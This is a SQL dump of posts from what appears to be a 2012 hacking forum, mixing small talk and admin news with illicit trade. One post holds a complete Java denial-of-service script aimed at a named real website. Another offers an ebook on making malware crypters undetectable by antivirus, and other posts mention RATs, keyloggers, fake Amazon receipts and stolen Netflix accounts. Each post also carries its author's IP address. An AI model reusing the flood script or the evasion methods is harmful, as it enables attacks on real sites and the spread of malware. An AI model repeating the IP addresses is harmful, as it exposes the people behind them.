`fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1368', '295', '0', '59', '[ebook] Crypter Blueprint', '0', '5', 'Timmy', '1346373955', 'Well Hello LH, I had this for a while now and I am thinking to give this PDP out. It has one of the best methods to make your crypter FUD. [align=center][img]https://d3e94wzv4dpoqy.cloudfront.net/g2/cc6fd247626c019d5bedba2f5fcc8361_g2.png[/img][/align] [align=center][b](some table of contents)[/b] \" What really is a crypter? All the Core Fundamentals \" Types and Forms of Crypters \" Most Common Questions about Crypters – Answered \" The #1 most imporant factors you should know about Crypters \" The Antivirus vs Crypter Concept \" What to always keep in mind when making an FUD Crypter \" Vb6 and Crypters \" Vb6 fundamentals \" basic vb6 outline for creating a crypter \" vb6 Crypter techniques blueprint \" vb6 what to do and what not to do \" The Antivirus Signatures Concept \" Finding and pinpointing Whats causing detection \" The Universal Undetection Process \" tools and automation \" What you will learn from Undetecting Crypters \" keeping your Crypters undetected[/align] [u][color=#32CD32]Virus Scan[/color]:[/u] [spoiler][url=http://www.virustotal.com/file-scan/report.html?id=e41194cb34ac6c19fc707c833fcfe9007240f43cc509ed243cc28a7b270d898d-1309201818]Virus Total[/url][/spoiler] [u][color=#32CD32]Download Link[/color]:[/u] [spoiler][url=http://adf.ly/1w0KG]Download Link[/url][/spoiler] By the way there is a password on the PDF file. I have provided the password therefore you guys wont have any trouble. Hope you like this.', '41.174.6.118', '699270774', '1', '0', '1', '1346720213', '1', '67c07b2a51de7f33d82da68df3d56c03', '0', '1346720213'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1371', '270', '1228', '7', 'RE: Hi everyone', '0', '55', 'Baws', '1346382075', 'I just have to... It\'s \"I\'ve\" not \"Iv\", I think you need to know that before college. :)', '98.176.49.100', '1655714148', '0', '0', '61', '1346383211', '1', 'f57a84e31884f0373066728f1253c08d', '0', '1346383211'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1372', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '2', 'Apathy', '1346382239', 'There is allready a multitude out but thanks nonetheless. Also you should make it filter out the spam ones. Such as the Dota key txt and the cracker that is actually a rat. Did you guys only find out about this now?', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '55c47da957f3d4e8c27c7aecc017b214', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1373', '296', '0', '55', '[Req] 50 Cents paypal', '0', '61', 'NXK', '1346383149', 'I need 50 cents paypal for a new sweater.. I don\'t want to take funds out of my bank for 50 cents and wait how ever long it takes. if you could help me out ill forever be your bitch.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '77550769ab942a6fe26b4e5672b09355', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1374', '270', '1371', '7', 'RE: Hi everyone', '0', '61', 'NXK', '1346383217', '[quote=\'Baws\' pid=\'1371\' dateline=\'1346382075\'] I just have to... It\'s \"I\'ve\" not \"Iv\", I think you need to know that before college. :) [/quote] Good thing i\'m in school for welding. Not anything to do with English.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '52d1bfff75e77393909a7778ead2937b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1375', '296', '1373', '55', 'RE: [Req] 50 Cents paypal', '0', '82', 'iTzIpod', '1346384327', 'Make a new paypal, and then PM me the Email. And I will send you .50 cents.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '18ecc4b140e96ba188a3cad592a6028b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1376', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '82', 'iTzIpod', '1346384804', 'Nice program. I will check it out tomorrow morning and will share my results. (;', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dfd065aee54223e518cc2ffe540aa6dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1377', '297', '0', '7', 'My new Work', '0', '54', 'Sin Cara', '1346388713', 'I just launched my new community.... if you wana see and join, please PM me... i will send you link.', '119.154.50.168', '2006594216', '1', '0', '0', '0', '1', 'e5a124e027777217ffa0ecfa4c88c2da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1378', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '84', 'Thunder™', '1346388941', 'Wow Thats Great Thanks For Program :)', '111.91.75.197', '1868254149', '0', '0', '0', '0', '1', 'be73940d56ca53afe518497a3b5d3b8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1379', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '112', '??????Z', '1346392478', 'i will buy one so you can have a vouch :). send me a pm with the pay pal email.', '92.22.246.107', '1545008747', '0', '0', '0', '0', '1', '0d0166b3ea961ec3a2d0381cbcd96f77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1380', '227', '920', '13', 'RE: hack twitter?', '0', '150', 'MinecraftGeek', '1346417520', 'What is his twitter username?', '86.161.179.151', '1453437847', '0', '0', '0', '0', '1', '7826207bfcf066f14387c5531ad0314a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1381', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '150', 'MinecraftGeek', '1346417570', 'Thanks fap :D Is there any proof of this working for you though? This seems very saturated and it is an old method.', '86.161.179.151', '1453437847', '0', '0', '0', '0', '1', '6aebe08e1bd67831527716614d1fc4a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1382', '283', '1337', '14', 'RE: Proxy List August 2012[Working]', '0', '150', 'MinecraftGeek', '1346417623', 'Proxy.org is literately a proxy list with hotlinks.', '86.161.179.151', '1453437847', '0', '0', '0', '0', '1', 'ca4911d5281417a9ec2a30770a4af5a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1383', '298', '0', '9', '???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '159', 'Victori0us', '1346419973', '[u][b]Accidentally Closed other thread.[/b][/u] Hello, today im sharing my well written ebook on how to make money. ive been advised by multiply people to \"close my thread and sell your ebook!\" but i am an extremely generous and selfless person and want to give it out free! Over 100+ user have been using the method i have help them with. I am glad to say 100% of them have found success. My method is 1) easy, it takes only minutes to set up and start earning. 2) fast in a matter of days you can earn lots of cash. 3) this is not bullshit it includes[b][size=medium] NO surveys, $hitcash, and NO BULLSHIT[/size][/b] This is fully auto pilot and requires no work except for the reading the ebook and setting up. [b]it also does not require you to invest anything 100% free[/b] You can earn $900 a month doing the slowest version of this method possible. [b]How do i get it?[/b] Post here and ill PM you with the download link. (direct download, media fire) Feel free to PM me [b]IN ADDITION to posting.[/b] Feel free to PM me with any questions. VirusTotal scan: [Spoiler] For anyone worried about being infected form a PDF [img]http://i.imgur.com/vTRDz.png[/img] [/Spoiler]', '65.27.123.23', '1092320023', '0', '0', '1', '1346457391', '1', '318cb42849d5be2b477cd3bec75c2d89', '0', '1346457391'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1384', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '82', 'iTzIpod', '1346422718', 'Agreed with MinecraftGeek. Have you ever tried this method?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '246096d56b939422f34af3c50c246545', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1385', '298', '1383', '9', 'RE: ???[EASY] HF\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '53', 'sirchamp', '1346422817', 'Can I have the file ? Thanks in Advance', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'fec400829ca98837eafdf1e9524b6cfd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1386', '186', '638', '16', 'RE: SE razor?', '0', '82', 'iTzIpod', '1346422829', '@@SSASIN, I can help you. Just message me on Skype. And then I will reply.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dcf28156c176b525dff5f1d188a4bb80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1387', '253', '1106', '56', 'RE: Count to 200', '0', '84', 'Thunder™', '1346436728', '14 Go Go Go We need 200 posts', '111.91.75.152', '1868254104', '0', '0', '0', '0', '1', '3f9cff4674c022d1c6f9b646eee28c1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1388', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '53', 'sirchamp', '1346441999', 'Ill take number 2 I hope I will win', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3058b1b0a7049fed610bcf10278488a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1389', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '1', 't3h jok3r', '1346456987', 'No problem. It\'s better to announce the problem instead of answering 10+ threads.', '41.151.148.202', '697799882', '1', '0', '0', '0', '1', '14a758f4772a9b8d9b655ee072466acd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1390', '297', '1377', '7', 'RE: My new Work', '0', '1', 't3h jok3r', '1346457465', 'If it\'s not related to Hacking and Cracking then you are allowed to advertise it publicly.', '41.151.148.202', '697799882', '1', '0', '0', '0', '1', 'c08c9aeef707c09da88e36c414dea30d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1391', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346457499', '15 because we have a new Admin.', '41.151.148.202', '697799882', '1', '0', '0', '0', '1', 'e4a333aa9fc1afeb206f214659a9d022', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1392', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1346458283', '@Kennerz, you can message me on Skype.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f3ae3c71a5b16582175e28a573eb2140', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1393', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346458355', 'Added @sirchamp', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdaece7cbff332ecbb3fee193bd30c7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1394', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '82', 'iTzIpod', '1346458442', 'May I have a direct link to the file? Thanks in advance.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50fa5b4919e2d69b085805dabd2a09cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1395', '297', '1377', '7', 'RE: My new Work', '0', '82', 'iTzIpod', '1346458522', 'Alright. I\'ll PM you', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9bea61383e42a695e81f18dc657ce33a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1396', '253', '1391', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346458674', '[quote=\'t3h jok3r\' pid=\'1391\' dateline=\'1346457499\'] 15 because we have a new Admin. [/quote] 16. What do you mean we have a new Admin? :o Who is it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4184affb03fad44f7a5a32838fe479dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1397', '299', '0', '3', 'Apathy Promoted!!!', '0', '1', 't3h jok3r', '1346458710', 'Apathy was brought back as an Admin, because I felt that he deserved another chance and honestly he is going through a bad time and if I was in his shoes I believe I would have done the same.', '41.151.134.19', '697796115', '1', '0', '0', '0', '1', '0dec0257b2aa0cd9a6093b36aae4c3c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1398', '299', '1397', '3', 'RE: Apathy Promoted!!!', '0', '82', 'iTzIpod', '1346458860', 'I don\'t know about this.. But in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '49cd528732665cca3093944116718345', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1399', '300', '0', '4', 'Whats up', '0', '162', 'Dingus', '1346458881', 'I\'m from HF originally but, I decided to come here to learn how to SE :) Greetings everyone, if you need help with rats, crypting, and [b][u]some[/u][/b] website shit, hit me up.', '209.188.74.94', '-776189346', '0', '0', '0', '0', '1', 'd6ee7327bc12ed60560a1e7334ce068a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1400', '300', '1399', '4', 'RE: Whats up', '0', '82', 'iTzIpod', '1346458923', 'Welcome to the forum Dingus. Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47c46b3aa5891a955d6630493a606894', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1401', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '162', 'Dingus', '1346459502', 'I\'d like to check this out, thanks mate :)', '209.188.74.94', '-776189346', '0', '0', '0', '0', '1', '0f78e1fe35fa4c4c899cbc3a27cc8c4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1402', '253', '1106', '56', 'RE: Count to 200', '0', '162', 'Dingus', '1346459591', '17. Because I\'m new here and feel like counting this twords my post count! hah.', '209.188.74.94', '-776189346', '0', '0', '0', '0', '1', 'bd02fd536b70cc65af77f46e42f3becb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1403', '262', '1171', '43', 'RE: Amazon Receipt Generator V.2', '0', '1', 't3h jok3r', '1346459638', 'They are slow but they are extremely easy to SE.', '41.151.134.19', '697796115', '1', '0', '0', '0', '1', '75e8b0ccec79e115a1229de28e97af73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1404', '301', '0', '25', 'Is keyscrambler good?', '0', '4', 'Triple H', '1346460501', 'I heard keyscrambler encrypts all your keystrokes and send it to the hacker if someone infected you with a RAT or Keylogger so I was wondering if it really works?', '41.151.168.124', '697804924', '1', '0', '0', '0', '1', 'fb403fc3326bca0c28f899cf65c2a7fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1405', '302', '0', '53', 'Java DoS Script', '0', '4', 'Triple H', '1346460658', '[color=#FF0000]I am not responsible for what you do with this tool.[/color] [color=#1E90FF]This tool was developed by Energizer/Karizma, please don\'t leech it. Enjoy[/color] [code] import java.io.BufferedWriter; import java.io.IOException; import java.io.OutputStreamWriter; import java.net.Socket; import java.net.UnknownHostException; /** * @author Energizer/Karizma * WarBot | Private Java Botnet */ public class DoS extends Socket implements Runnable { static int vir; static DoS _instance = new DoS(); final String TARGET = \"ubers.org\"; public static void main(String[] args) { for (int i = 0; i < 5; i++) new Thread(_instance).start(); } @SuppressWarnings(\"unused\") public void run() { for (int i = 1; i < 1000000; i++) { try { if (TARGET == \"website.org\") { ubers(); return; } Socket net = new Socket(TARGET, 80); // connects the Socket to the TARGET port 80. sendRawLine(\"GET / HTTP/1.1\", net); // Sends the GET / OutputStream sendRawLine(\"Host: \" + TARGET, net); // Sends Host: to the OutputStream System.out.println(\"Current Connection: \" + i); } catch (UnknownHostException e) { System.out.println(\"DDoS.run: \" + e); } catch (IOException e) { System.out.println(\"DDoS.run: \" + e); } } } public static void ubers() { while (true) { System.out.println(\"Fucking yo cpu\");//lol vir=(vir+10)*10/1000000; } } public static void sendRawLine(String text, Socket sock) { try { BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream())); out.write(text + \" \"); out.flush(); } catch (IOException ex) { ex.printStackTrace(); } } } [/code]', '41.151.168.124', '697804924', '1', '0', '0', '0', '1', '55a6224988f77c100b359ea971f38a03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1406', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346460734', '18. Oh so I noticed that Apathy just got promoted to Admin.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'edb026b8e74f038650f388807aa91f2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1407', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '61', 'NXK', '1346463477', 'Id like to get this. PM me whenever you have time :)', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '28aab93118c6d9e2c0afabcb8500df51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1408', '303', '0', '4', 'Heyo', '0', '156', 'Omniscent', '1346465732', 'Hey guys, my name is 5t0rm. I got invited to this website by kamz89 to discuss about SEing and such. I also am part of his Social Engineering group. I look forward to meeting you all, peace.', '74.14.157.68', '1242471748', '0', '0', '0', '0', '1', '66a358f1d40f89e6abb65982b4347267', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1409', '303', '1408', '4', 'RE: Heyo', '0', '82', 'iTzIpod', '1346466761', 'Hey 5t0rm, welcome to L33tHacking. Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84f70fc49d24c406e786c04add7d45f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1410', '299', '1398', '3', 'RE: Apathy Promoted!!!', '0', '55', 'Baws', '1346467223', '[quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\'] I don\'t know about this.. But in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time. [/quote] Stop being an asshole and picking on him. OT: Grats Apathy!', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '7706df43851af2c4d83f649dfa6f7c6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1411', '299', '1410', '3', 'RE: Apathy Promoted!!!', '0', '2', 'Apathy', '1346469660', '[quote=\'Baws\' pid=\'1410\' dateline=\'1346467223\'] [quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\'] I don\'t know about this.. But in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time. [/quote] Stop being an asshole and picking on him. OT: Grats Apathy! [/quote] Thanks baws :)', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '72a2cc8cb0930c57b4bfdb2ebca95a65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1412', '299', '1398', '3', 'RE: Apathy Promoted!!!', '0', '2', 'Apathy', '1346469735', '[quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\'] I don\'t know about this.. But in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time. [/quote] You also do not know what was going on. :3 but thanks nonetheless.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '2390cde44657024f999181fe6412fff5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1413', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '2', 'Apathy', '1346469821', 'I was curious why awards were gone. :3 thanks for letting us know.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '45df5b684adc9e10e00c66222af167ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1414', '304', '0', '3', 'Explainations on recent events.', '0', '2', 'Apathy', '1346470631', 'As some of you may know I recently had my admin powers removed from me. And this is a non detailed explanation of what happend and why it happend. I recently have gone through the worst moment in my life when / very close friend of mine passed away. I was in depression and I was angry at god(no I am not religious) and well everything. I sorta vented my anger and frustration on here and acted childish. Someone called me out on it and I got mad did some things I possibly shouldint have and did not explain why I did stuff. So therefor lost my position as a admin. Me and joker are very good friends online( BFF online LOL) he knew a little of what was going on so I explained everything to him and he understood. I am not making excuses I am telling you what happend. I am sorry for what I did. And I should not have acted the way I did. I will make one thing clear right now though. [b][size=medium]I will not tolerate bad attitude[/size][/b] This goes to someone, he knows who he is, hopefully this is a 